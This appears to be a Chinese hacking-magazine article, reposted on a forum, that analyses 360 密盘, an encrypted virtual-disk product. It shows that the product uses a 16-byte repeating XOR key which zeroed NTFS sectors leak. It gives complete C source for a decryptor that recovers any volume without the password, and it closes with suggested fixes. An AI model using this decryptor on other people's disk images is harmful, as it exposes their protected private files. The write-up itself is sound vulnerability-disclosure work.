360密盘是360公司最新出的一款保护用户资料不外泄的加密工具,在黑客防线2010年第12期的文章上我提到绕过文件透明加密机制的方法,我提到过360密盘加密机制,它的就是利用一个文件虚拟成磁盘,也就是FileDisk的原理,了解到这一步大家就可以明白360密盘的工作原理,通过网络验证来打开加密盘符,大家再仔细想一想,是不是验证成功,就马上解密出原先加过密的镜像文件(也就是虚拟磁盘360密盘X),解密的结果如下图1:
由于360密盘是内嵌入360安全卫士的,所以需要安装360安全卫士才会安装360密盘,其实可以将360密盘直接剥离出360安全卫士。在360安装目录下建一个360safe文件夹,这个其实就是安装360安全卫士产生的目录,里面建一个文件夹名为mipan的目录,还需要一个360Common.dll的公用通信的动态链接库文件,如下图2所示:
用加载驱动的工具加载360mipan.sys驱动,然后就可以使用360密盘了。在磁盘分区下会生成文件目录360mipan,里面就保存着密盘(其实它是以文件的形式保存的,对操作文件模拟成对磁盘的操作,对于用户来说是透明的)。第一次登陆时,需要网络验证,登陆后在mipan目录下会生成三个文件:mipan.ini、autologin.data、savepass.dat,mipan.ini是配置文件里面有几个参数,一个是自动登陆的参数AutoLogin,如果为1,下次就直接与autologin.data中保存的账号和密码进行验证,不需要再进行网络验证,如果将AutoLogin设置为0,并且删除autologin.data,将需要再次进行网络验证。如果从autologin.data中已加密的数据逆推出原始帐号,这肯定不行,万一不是对称加密或者是单向散列算法呢?进行网络截包分析,因为网络验证,最后要需要进行网络应答的,但是这也会存在问题,因为你伪装网络服务器,回应登录成功的包后,解密加过密的密盘文件,仍然需要正确的原始帐号和密码,或者通过原始的帐号和密码对称加过密后的密文。所以上面这些想法我觉得都不太好,最好的方法就是对使用对称加密的密盘进行分析,看是否能找到一点“蛛丝马迹”。我在测试中发现如果加密一个1G的盘,其生成的文件要大于1G,正好相差1M(1024*1024字节),我使用WinHex软件打开密盘文件(该文件保存在密盘目录360mipan下扩展名为360sv的文件,该文件与360卫士挂钩,必须通过登录360密盘软件才能删除该文件),然后偏移1M的文件位置来查看该*.360sv文件,360密盘的文件格式是NTFS,我们可以结合NTFS磁盘格式来分析,效果如下图3:
很显然这些数据肯定是加过密的,因为我们知道磁盘分区的第一个扇区是磁盘启动扇区 ,紧接着是MFT,由读取MFT来定位磁盘上的文件, BOOTSECTOR是在最开始的第一个扇区,这里我不做过多分析,有机会在跟大家学习,关键看第二个扇区,这个扇区属于NTLDR区域(含有15个扇区),总共这16个扇区(包括前面的BOOTSECTOR)我们称之为NTFS的引导模块。从第二个扇区0x21开始连续有48个字节是0,从上面的截图我们可以看到也就是0x220-0x240,这3行的数据是一样的,大家仔细看看是不是,”真的是呀,我肯定一定以及确定”,开个玩笑,继续言归正传,假设这三行里就是密钥呢?为什么呢,因为如果是xor异或算法,A^0=A,B^0=B,只要任何数跟0进行异或都是它本身,不会变得,所以我们可以认为0x220这一行数就是密钥,如下:
(E3 01 D9 D1 25 8C B1 27 66 F4 DA 6E 7A 62 58 CF),我们拿这16个字节循环来与第一个扇区异或,可以看到熟悉的BOOTSECTOR里的一些不变信息比如开头3个字节的跳转指令(EB 52 90),后面接着8个字节(文件系统格式NTFS+4个空格),还有出错信息、引导区结束标志(55 AA),通过这些分析,我们可以知道360密盘就是采取异或的方式加密,并且密钥就在文件中,有了这些信息,我们可以写出解密程序,不久前网上已经有人爆出了破解360密盘的程序,但是我还是给大家提供了源代码,因为我无聊,所以把它给逆了,并且也仿写了一个跟它一模一样程序,核心代码如下:
BOOLEAN decode360mipan(LPCSTR sourcefile,LPCSTR destfile)
{
HMODULE hModule;
BOOLEAN result=FALSE;
DWORD dwFileAttributes;
HANDLE sourcehandle;
HANDLE desthandle;
LARGE_INTEGER fileSize={0};
LARGE_INTEGER filepos={0};
LONGLONG MinSize=0x100000;
HANDLE maphandle;
ULONG tmpsize;
DWORD dwNumberOfBytesToMap = 0x1000000;
PVOID mapAddress = NULL;
PDWORD contrastpos1,contrastpos2;
int num;
BOOL different;
PCHAR MiPanKeyOffset;
ULONG i;
BYTE Viscera;
DWORD NumberOfBytesWritten;
LARGE_INTEGER remainbytes={0};
LARGE_INTEGER useedbytes={0};
float percent;
dwFileAttributes = GetFileAttributesA(sourcefile);
SetFileAttributesA(sourcefile, 0x80u);
sourcehandle = CreateFileA(sourcefile,GENERIC_READ,FILE_SHARE_READ, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if (sourcehandle == INVALID_HANDLE_VALUE)
{
SetFileAttributesA(sourcefile, dwFileAttributes);
}
else
{
hModule = LoadLibraryA("kernel32.dll");
if (!hModule)
{
printf("LoadDll kernel32.dll failed!\n ");
FreeLibrary(hModule);
return FALSE;
}
DWORD _GetFileSizeEx=(DWORD)GetProcAddress(hModule,"GetFileSizeEx");
_asm{
push esi
lea esi,fileSize
push esi
push sourcehandle
call _GetFileSizeEx
pop esi
}
//至少文件大小要大于1M
if (fileSize.QuadPart > MinSize)
{
maphandle = CreateFileMapping(sourcehandle,NULL,PAGE_READONLY,0,0,NULL);
if (maphandle)
{
//解密的文件句柄
desthandle = CreateFileA(destfile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (desthandle != INVALID_HANDLE_VALUE)
{
//1M大小
tmpsize = 1048576;
//从文件起始偏移的位置开始读取文件
filepos.QuadPart = 1048576i64;
while(1)
{
if (filepos.HighPart >fileSize.HighPart)
break;
if (filepos.HighPart >=fileSize.HighPart && tmpsize >= fileSize.LowPart)
break;
//从已加密的360密盘文件中每次读取16M内容来解密
mapAddress= MapViewOfFile(maphandle,FILE_MAP_READ,filepos.HighPart,filepos.LowPart,dwNumberOfBytesToMap);
if (mapAddress)
{
//得到360密盘的密钥,起始很简单,xor算法中任何数跟0异或得到的是自己,这就是获取360密钥原因,主要是ntfs稀疏文件存在的问题,这不是密码的问题,而是设计上的不足
if (filepos.LowPart == 1048576 && !filepos.HighPart)
{
memcpy((void*)&MiPanKey,(void *)((PCHAR)mapAddress+0x220),16);
num = 4;
contrastpos1 = (DWORD*)((PCHAR)mapAddress+0x230);
//连续3个的16字节都是360密盘密钥,都相等,
different =TRUE;
MiPanKeyOffset =(PCHAR)&MiPanKey;
do
{
if (!num)
break;
different=(*(DWORD*)contrastpos1 == *(DWORD*)MiPanKeyOffset) ? TRUE : FALSE;
num--;
MiPanKeyOffset=(PCHAR)MiPanKeyOffset +4;
contrastpos1++;
} while(different);
if (!different)
break;
//再比较偏移0x20的16个字节
num = 4;
contrastpos2 = (DWORD*)((PCHAR)mapAddress+0x240);
different =TRUE;
MiPanKeyOffset =(PCHAR)&MiPanKey;
do
{
if (!num)
break;
different=(*(DWORD*)contrastpos2 == *(DWORD*)MiPanKeyOffset) ? TRUE : FALSE;
num--;
MiPanKeyOffset=(PCHAR)MiPanKeyOffset +4;
contrastpos2++;
} while(different);
if (!different)
break;
}
//验证得到密钥后,就将前面映射的内容解密后写到解密文件中
i=0;
while (i<dwNumberOfBytesToMap)
{
Viscera = *((PCHAR)mapAddress+i);
Viscera = (BYTE)(Viscera^MiPanKey[i&0xF]);
Outbuffer[i]=Viscera;
i++;
}
WriteFile(desthandle,(PVOID)&Outbuffer,dwNumberOfBytesToMap,&NumberOfBytesWritten,NULL);
UnmapViewOfFile(mapAddress);
}
tmpsize+=dwNumberOfBytesToMap;
filepos.QuadPart = tmpsize;
remainbytes.QuadPart =fileSize.QuadPart - 1048576i64;
useedbytes.QuadPart +=dwNumberOfBytesToMap;
percent = (float)(useedbytes.QuadPart) / (float)(remainbytes.QuadPart);
printf("Process...%d%%\r",(int)(percent*100));
}
if (tmpsize == fileSize.LowPart)
{
printf("\n");
result = TRUE;
}
CloseHandle(desthandle);
}
CloseHandle(maphandle);
}
CloseHandle(sourcehandle);
}
SetFileAttributesA(sourcefile, dwFileAttributes);
}
return result;
}
代码我就不多解释了,自己看注视,我认为已经写的很详细了,大家要养成好的代码风格,以后自己再看的时候也会方便些,其实我是在说自己。下面就演示一下解密密盘,不好意思,这里我偷懒一下,我写的是控制台程序,不过原来的也是个控制台程序,示意图4如下:
使用WinImage软件将hacker.img镜像文件打开,示意图5如下啊:
文章到这里就结束了,但是我们可以看到造成破解密码的问题并不是360密盘采取的异或算法出现问题,而是由于NTFS文件格式所引发的问题,最新的360密盘应该已经解决这个问题,除非有些用户还没有来得及升级,其实解决的办法很简单,如果遇到连续16个字节的0时,不进行加密,跳过即可,或者用前面加密数据做为后面加密的密钥,但是这样做并不代表就一定安全,完全可以编写字典数据来进行异或测试、甚至对比分析已知密文、已知明文来进行解密,当然这样难度更大。实际上加密算法越简单,那么加密速度也就越快,对于用户来说,他当然希望越快越好,因为加密过程对于用户来说是透明的,但是要保证加密数据的安全,就应该使用更复杂的加密算法,但是复杂的加密算法则需要大量的时间,因为加密步骤复杂,相应解密步骤也就复杂,对于对称加密算法而言,这是无法调和的矛盾。不管再复杂的加密算法,除非其本身不存在漏洞,不然就有可能被攻破。但是我们知道,世界上没有绝对安全的加密算法,只要有足够长的时间、足够多的集群服务器进行网格计算破解,那么任何密钥都有可能被攻破,题外话。相信大家已经能从中明白点什么了。不足之处,敬请黑防读者们不吝赐教!
本文发表在黑客防线2011年第4期
附上源程序代码
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!